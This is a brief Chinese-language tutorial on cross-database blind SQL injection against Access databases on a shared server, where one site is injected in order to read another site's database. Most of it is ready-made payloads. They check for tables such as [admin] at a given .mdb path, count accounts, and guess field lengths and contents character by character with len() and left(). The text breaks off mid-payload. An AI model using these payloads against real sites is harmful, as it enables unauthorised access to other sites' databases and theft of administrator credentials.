跨库注入之逐字猜解法
跨库注入适用环境↓
在B站点注入A站点。
前提,B和A在同服。
跨库目标位置
C:\Program Files\r3sec\#Data.mdb
判断存在的表↓
And 1=(Select Count(*) from [数据库路径].[表])
实际判断表的语句↓
And 1=(Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin])
判断字段
And 1=(Select Count(字段) from [数据库路径].[表])
猜帐号数量
And (Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin])>0
猜解字段长度
where len(字段)=5
//经常出错 兼容性不好。
4位
5位
16位
猜解字段内容
where left(字段,1)='a'
//指定字段内容,取1位
根据当前注入构造的语句↓
And 1=(Select Count(*) from [C:\Inetpub\ww